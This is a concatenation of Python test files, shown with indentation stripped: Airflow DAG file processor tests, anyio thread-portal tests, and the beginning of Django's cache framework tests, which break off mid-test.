# We need to _actually_ parse the files here to test the behaviour.
# Right now the parsing code lives in SchedulerJob, even though it's
# called via utils.dag_processing.
from airflow.jobs.scheduler_job import SchedulerJob
dag_id = 'exit_test_dag'
dag_directory = TEST_DAG_FOLDER.parent / 'dags_with_system_exit'
# Delete the one valid DAG/SerializedDAG, and check that it gets re-created
clear_db_dags()
clear_db_serialized_dags()
child_pipe, parent_pipe = multiprocessing.Pipe()
manager = DagFileProcessorManager(
dag_directory=dag_directory,
dag_ids=[],
max_runs=1,
processor_factory=SchedulerJob._create_dag_file_processor,
processor_timeout=timedelta(seconds=5),
signal_conn=child_pipe,
pickle_dags=False,
async_mode=True,
)
manager._run_parsing_loop()
result = None
while parent_pipe.poll(timeout=None):
result = parent_pipe.recv()
if isinstance(result, DagParsingStat) and result.done:
break
# Three files in folder should be processed
assert sum(stat.run_count for stat in manager._file_stats.values()) == 3
with create_session() as session:
assert session.query(DagModel).get(dag_id) is not None
@conf_vars({('core', 'load_examples'): 'False'})
@pytest.mark.backend("mysql", "postgres")
@pytest.mark.execution_timeout(30)
def test_pipe_full_deadlock(self):
dag_filepath = TEST_DAG_FOLDER / "test_scheduler_dags.py"
child_pipe, parent_pipe = multiprocessing.Pipe()
# Shrink the buffers to exacerbate the problem!
for fd in (parent_pipe.fileno(),):
sock = socket.socket(fileno=fd)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
sock.detach()
exit_event = threading.Event()
# To test this behaviour we need something that continually fills the
# parent pipe's buffer (and keeps it full).
def keep_pipe_full(pipe, exit_event):
n = 0
while True:
if exit_event.is_set():
break
req = CallbackRequest(str(dag_filepath))
try:
logging.debug("Sending CallbackRequests %d", n + 1)
pipe.send(req)
except TypeError:
# This is actually the error you get when the parent pipe
# is closed! Nicely handled, eh?
break
except OSError:
break
n += 1
logging.debug(" Sent %d CallbackRequests", n)
thread = threading.Thread(target=keep_pipe_full, args=(parent_pipe, exit_event))
fake_processors = []
def fake_processor_factory(*args, **kwargs):
nonlocal fake_processors
processor = FakeDagFileProcessorRunner._fake_dag_processor_factory(*args, **kwargs)
fake_processors.append(processor)
return processor
manager = DagFileProcessorManager(
dag_directory=dag_filepath,
dag_ids=[],
            # A reasonably large number to ensure that we trigger the deadlock
max_runs=100,
processor_factory=fake_processor_factory,
processor_timeout=timedelta(seconds=5),
signal_conn=child_pipe,
pickle_dags=False,
async_mode=True,
)
try:
thread.start()
# If this completes without hanging, then the test is good!
manager._run_parsing_loop()
exit_event.set()
finally:
logging.info("Closing pipes")
parent_pipe.close()
child_pipe.close()
thread.join(timeout=1.0)
class TestDagFileProcessorAgent(unittest.TestCase):
def setUp(self):
# Make sure that the configure_logging is not cached
self.old_modules = dict(sys.modules)
def tearDown(self):
# Remove any new modules imported during the test run. This lets us
# import the same source files for more than one test.
remove_list = []
for mod in sys.modules:
if mod not in self.old_modules:
remove_list.append(mod)
for mod in remove_list:
del sys.modules[mod]
@staticmethod
def _processor_factory(file_path, zombies, dag_ids, pickle_dags):
return DagFileProcessorProcess(file_path, pickle_dags, dag_ids, zombies)
def test_reload_module(self):
"""
        Configure the context to have logging.logging_config_class set to a fake logging
        class path; when the logging module is then reloaded, the airflow.processor_manager
        logger should not be configured.
"""
with settings_context(SETTINGS_FILE_VALID):
            # Launch a process through DagFileProcessorAgent, which will try
            # to reload the logging module.
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(
test_dag_path, 0, type(self)._processor_factory, timedelta.max, [], False, async_mode
)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
processor_agent._process.join()
            # Since we are reloading the logging config rather than creating this file,
            # we expect it to be nonexistent.
assert not os.path.isfile(log_file_loc)
@conf_vars({('core', 'load_examples'): 'False'})
def test_parse_once(self):
clear_db_serialized_dags()
clear_db_dags()
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
processor_agent = DagFileProcessorAgent(
test_dag_path, 1, type(self)._processor_factory, timedelta.max, [], False, async_mode
)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
while not processor_agent.done:
if not async_mode:
processor_agent.wait_until_finished()
processor_agent.heartbeat()
assert processor_agent.all_files_processed
assert processor_agent.done
with create_session() as session:
dag_ids = session.query(DagModel.dag_id).order_by("dag_id").all()
assert dag_ids == [('test_start_date_scheduling',), ('test_task_start_date_scheduling',)]
dag_ids = session.query(SerializedDagModel.dag_id).order_by("dag_id").all()
assert dag_ids == [('test_start_date_scheduling',), ('test_task_start_date_scheduling',)]
def test_launch_process(self):
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(
test_dag_path, 0, type(self)._processor_factory, timedelta.max, [], False, async_mode
)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
processor_agent._process.join()
assert os.path.isfile(log_file_loc)
|
test_from_thread.py
|
import sys
import threading
import time
from concurrent.futures import CancelledError
from contextlib import suppress
from typing import Any, Dict, List, NoReturn, Optional
import pytest
from anyio import (
Event, from_thread, get_cancelled_exc_class, get_current_task, run, sleep, to_thread,
wait_all_tasks_blocked)
from anyio.abc import TaskStatus
from anyio.from_thread import BlockingPortal, start_blocking_portal
if sys.version_info >= (3, 8):
from typing import Literal
else:
from typing_extensions import Literal
pytestmark = pytest.mark.anyio
class TestRunAsyncFromThread:
async def test_run_async_from_thread(self) -> None:
async def add(a: int, b: int) -> int:
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a: int, b: int) -> int:
assert threading.get_ident() != event_loop_thread_id
return from_thread.run(add, a, b)
event_loop_thread_id = threading.get_ident()
result = await to_thread.run_sync(worker, 1, 2)
assert result == 3
async def test_run_sync_from_thread(self) -> None:
def add(a: int, b: int) -> int:
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a: int, b: int) -> int:
assert threading.get_ident() != event_loop_thread_id
return from_thread.run_sync(add, a, b)
event_loop_thread_id = threading.get_ident()
result = await to_thread.run_sync(worker, 1, 2)
assert result == 3
def test_run_sync_from_thread_pooling(self) -> None:
async def main() -> None:
thread_ids = set()
for _ in range(5):
thread_ids.add(await to_thread.run_sync(threading.get_ident))
# Expects that all the work has been done in the same worker thread
assert len(thread_ids) == 1
assert thread_ids.pop() != threading.get_ident()
assert threading.active_count() == initial_count + 1
# The thread should not exist after the event loop has been closed
initial_count = threading.active_count()
run(main, backend='asyncio')
for _ in range(10):
if threading.active_count() == initial_count:
return
time.sleep(0.1)
pytest.fail('Worker thread did not exit within 1 second')
async def test_run_async_from_thread_exception(self) -> None:
async def add(a: int, b: int) -> int:
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a: int, b: int) -> int:
assert threading.get_ident() != event_loop_thread_id
return from_thread.run(add, a, b)
event_loop_thread_id = threading.get_ident()
with pytest.raises(TypeError) as exc:
await to_thread.run_sync(worker, 1, 'foo')
exc.match("unsupported operand type")
async def test_run_sync_from_thread_exception(self) -> None:
def add(a: int, b: int) -> int:
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a: int, b: int) -> int:
assert threading.get_ident() != event_loop_thread_id
return from_thread.run_sync(add, a, b)
event_loop_thread_id = threading.get_ident()
with pytest.raises(TypeError) as exc:
await to_thread.run_sync(worker, 1, 'foo')
exc.match("unsupported operand type")
async def test_run_anyio_async_func_from_thread(self) -> None:
def worker(*args: int) -> Literal[True]:
from_thread.run(sleep, *args)
return True
assert await to_thread.run_sync(worker, 0)
def test_run_async_from_unclaimed_thread(self) -> None:
async def foo() -> None:
pass
exc = pytest.raises(RuntimeError, from_thread.run, foo)
exc.match('This function can only be run from an AnyIO worker thread')
class TestRunSyncFromThread:
def test_run_sync_from_unclaimed_thread(self) -> None:
def foo() -> None:
pass
exc = pytest.raises(RuntimeError, from_thread.run_sync, foo)
exc.match('This function can only be run from an AnyIO worker thread')
class TestBlockingPortal:
class AsyncCM:
def __init__(self, ignore_error: bool):
self.ignore_error = ignore_error
async def __aenter__(self) -> Literal["test"]:
return 'test'
async def __aexit__(self, exc_type: object, exc_val: object, exc_tb: object) -> bool:
return self.ignore_error
async def test_successful_call(self) -> None:
async def async_get_thread_id() -> int:
return threading.get_ident()
def external_thread() -> None:
thread_ids.append(portal.call(threading.get_ident))
thread_ids.append(portal.call(async_get_thread_id))
thread_ids: List[int] = []
async with BlockingPortal() as portal:
thread = threading.Thread(target=external_thread)
thread.start()
await to_thread.run_sync(thread.join)
for thread_id in thread_ids:
assert thread_id == threading.get_ident()
async def test_aexit_with_exception(self) -> None:
"""Test that when the portal exits with an exception, all tasks are cancelled."""
def external_thread() -> None:
try:
portal.call(sleep, 3)
except BaseException as exc:
results.append(exc)
else:
results.append(None)
results: List[Optional[BaseException]] = []
with suppress(Exception):
async with BlockingPortal() as portal:
thread1 = threading.Thread(target=external_thread)
thread1.start()
thread2 = threading.Thread(target=external_thread)
thread2.start()
await sleep(0.1)
assert not results
raise Exception
await to_thread.run_sync(thread1.join)
await to_thread.run_sync(thread2.join)
assert len(results) == 2
assert isinstance(results[0], CancelledError)
assert isinstance(results[1], CancelledError)
async def test_aexit_without_exception(self) -> None:
"""Test that when the portal exits, it waits for all tasks to finish."""
def external_thread() -> None:
try:
portal.call(sleep, 0.2)
except BaseException as exc:
results.append(exc)
else:
results.append(None)
results: List[Optional[BaseException]] = []
async with BlockingPortal() as portal:
thread1 = threading.Thread(target=external_thread)
thread1.start()
thread2 = threading.Thread(target=external_thread)
thread2.start()
await sleep(0.1)
assert not results
await to_thread.run_sync(thread1.join)
await to_thread.run_sync(thread2.join)
assert results == [None, None]
async def test_call_portal_from_event_loop_thread(self) -> None:
async with BlockingPortal() as portal:
exc = pytest.raises(RuntimeError, portal.call, threading.get_ident)
exc.match('This method cannot be called from the event loop thread')
def test_start_with_new_event_loop(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
async def async_get_thread_id() -> int:
return threading.get_ident()
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
thread_id = portal.call(async_get_thread_id)
assert isinstance(thread_id, int)
assert thread_id != threading.get_ident()
def test_start_with_nonexistent_backend(self) -> None:
with pytest.raises(LookupError) as exc:
with start_blocking_portal('foo'):
pass
exc.match('No such backend: foo')
def test_call_stopped_portal(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
pass
pytest.raises(RuntimeError, portal.call, threading.get_ident).\
match('This portal is not running')
def test_start_task_soon(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
async def event_waiter() -> Literal["test"]:
await event1.wait()
event2.set()
return 'test'
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
event1 = portal.call(Event)
event2 = portal.call(Event)
future = portal.start_task_soon(event_waiter)
portal.call(event1.set)
portal.call(event2.wait)
assert future.result() == 'test'
def test_start_task_soon_cancel_later(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
async def noop() -> None:
await sleep(2)
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future = portal.start_task_soon(noop)
portal.call(wait_all_tasks_blocked)
future.cancel()
assert future.cancelled()
def test_start_task_soon_cancel_immediately(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
cancelled = False
async def event_waiter() -> None:
nonlocal cancelled
try:
await sleep(3)
except get_cancelled_exc_class():
cancelled = True
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future = portal.start_task_soon(event_waiter)
future.cancel()
assert cancelled
def test_start_task_soon_with_name(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
task_name = None
async def taskfunc() -> None:
nonlocal task_name
task_name = get_current_task().name
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
portal.start_task_soon(taskfunc, name='testname')
assert task_name == 'testname'
def test_async_context_manager_success(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with portal.wrap_async_context_manager(TestBlockingPortal.AsyncCM(False)) as cm:
assert cm == 'test'
def test_async_context_manager_error(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with pytest.raises(Exception) as exc:
with portal.wrap_async_context_manager(TestBlockingPortal.AsyncCM(False)) as cm:
assert cm == 'test'
raise Exception('should NOT be ignored')
exc.match('should NOT be ignored')
def test_async_context_manager_error_ignore(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with portal.wrap_async_context_manager(TestBlockingPortal.AsyncCM(True)) as cm:
assert cm == 'test'
raise Exception('should be ignored')
def test_start_no_value(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
def taskfunc(*, task_status: TaskStatus) -> None:
task_status.started()
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future, value = portal.start_task(taskfunc) # type: ignore[arg-type]
assert value is None
assert future.result() is None
def test_start_with_value(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
def taskfunc(*, task_status: TaskStatus) -> None:
task_status.started('foo')
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future, value = portal.start_task(taskfunc) # type: ignore[arg-type]
assert value == 'foo'
assert future.result() is None
def test_start_crash_before_started_call(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
def taskfunc(*, task_status: object) -> NoReturn:
raise Exception('foo')
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with pytest.raises(Exception, match='foo'):
portal.start_task(taskfunc)
def test_start_crash_after_started_call(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
def taskfunc(*, task_status: TaskStatus) -> NoReturn:
task_status.started(2)
raise Exception('foo')
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future, value = portal.start_task(taskfunc)
assert value == 2
with pytest.raises(Exception, match='foo'):
future.result()
def test_start_no_started_call(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
def taskfunc(*, task_status: TaskStatus) -> None:
pass
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with pytest.raises(RuntimeError, match='Task exited'):
portal.start_task(taskfunc) # type: ignore[arg-type]
def test_start_with_name(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
def taskfunc(*, task_status: TaskStatus) -> None:
task_status.started(get_current_task().name)
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future, start_value = portal.start_task(
taskfunc, name='testname') # type: ignore[arg-type]
assert start_value == 'testname'
|
tests.py
|
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import sys
import tempfile
import threading
import time
import unittest
from pathlib import Path
from unittest import mock, skipIf
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheHandler, CacheKeyWarning, InvalidCacheKey, cache,
caches,
)
from django.core.cache.backends.base import InvalidCacheBackendError
from django.core.cache.backends.redis import RedisCacheClient
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.db.backends.utils import CursorWrapper
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.test.utils import CaptureQueriesContext
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers,
)
from django.views.decorators.cache import cache_control, cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
def empty_response(request):
return HttpResponse()
KEY_ERRORS_WITH_MEMCACHED_MSG = (
'Cache key contains characters that will cause errors if used with '
'memcached: %r'
)
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
self.assertIs(cache.add("addkey1", "value"), True)
self.assertIs(cache.add("addkey1", "newvalue"), True)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_get_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.get_many(['key with spaces'])
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertIsNone(cache.get("key1"))
self.assertIs(cache.delete("key1"), False)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertIs(cache.has_key("hello1"), False)
self.assertIs(cache.has_key("goodbye1"), False)
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
with self.assertRaises(ValueError):
cache.incr('does_not_exist', -1)
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
with self.assertRaises(ValueError):
cache.decr('does_not_exist', -1)
def test_touch(self):
"""Dummy cache can't do touch()."""
self.assertIs(cache.touch('whatever'), False)
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
self.assertIs(cache.add("expire2", "newvalue"), True)
self.assertIsNone(cache.get("expire2"))
self.assertIs(cache.has_key("expire3"), False)
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
self.assertEqual(cache.set_many({'a': 1, 'b': 2}), [])
self.assertEqual(cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1'), [])
def test_set_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.set_many({'key with spaces': 'foo'})
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_delete_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.delete_many(['key with spaces'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertIsNone(cache.get_or_set('mykey', None))
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
    # `params` are test-specific overrides and `_caches_setting_base` is the
    # base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
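# Illustrative sketch (not used by the test suite): assuming a hypothetical
# locmem ``base`` config, caches_setting_for_tests() merges settings in the
# order params -> _caches_setting_base -> base described above.
def _caches_setting_for_tests_example():
    example = caches_setting_for_tests(
        base={'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
        exclude={'cull', 'zero_cull'},
        TIMEOUT=30,  # test-specific override applied to every remaining alias
    )
    # example['v2'] now holds BACKEND from ``base``, VERSION=2 from
    # ``_caches_setting_base``, and TIMEOUT=30 from ``params``.
    return example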
class BaseCacheTests:
# A common set of tests to apply to all cache backends
factory = RequestFactory()
# Some clients raise custom exceptions when .incr() or .decr() are called
# with a non-integer value.
incr_decr_type_error = TypeError
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_default_used_when_none_is_set(self):
"""If None is cached, get() returns it instead of the default."""
cache.set('key_default_none', None)
self.assertIsNone(cache.get('key_default_none', default='default'))
def test_add(self):
# A key can be added to a cache
self.assertIs(cache.add("addkey1", "value"), True)
self.assertIs(cache.add("addkey1", "newvalue"), False)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
        # Test for cache key conflicts between caches that share the same backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertIs(caches['prefix'].has_key('somekey'), False)
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
self.assertEqual(cache.get_many(iter(['a', 'b', 'e'])), {'a': 'a', 'b': 'b'})
cache.set_many({'x': None, 'y': 1})
self.assertEqual(cache.get_many(['x', 'y']), {'x': None, 'y': 1})
def test_delete(self):
# Cache keys can be deleted
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(cache.get("key1"), "spam")
self.assertIs(cache.delete("key1"), True)
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_delete_nonexistent(self):
self.assertIs(cache.delete('nonexistent_key'), False)
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertIs(cache.has_key("hello1"), True)
self.assertIs(cache.has_key("goodbye1"), False)
cache.set("no_expiry", "here", None)
self.assertIs(cache.has_key("no_expiry"), True)
cache.set('null', None)
self.assertIs(cache.has_key('null'), True)
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
cache.set('null', None)
self.assertIn('null', cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
with self.assertRaises(ValueError):
cache.incr('does_not_exist', -1)
cache.set('null', None)
with self.assertRaises(self.incr_decr_type_error):
cache.incr('null')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
with self.assertRaises(ValueError):
            cache.decr('does_not_exist', -1)
cache.set('null', None)
with self.assertRaises(self.incr_decr_type_error):
cache.decr('null')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
        # Don't want fields with a callable default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
        # Don't want fields with a callable default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
        # Don't want fields with a callable default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
self.assertIs(cache.add("expire2", "newvalue"), True)
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertIs(cache.has_key("expire3"), False)
def test_touch(self):
# cache.touch() updates the timeout.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1', timeout=4), True)
time.sleep(2)
self.assertIs(cache.has_key('expire1'), True)
time.sleep(3)
self.assertIs(cache.has_key('expire1'), False)
# cache.touch() works without the timeout argument.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1'), True)
time.sleep(2)
self.assertIs(cache.has_key('expire1'), True)
self.assertIs(cache.touch('nonexistent'), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
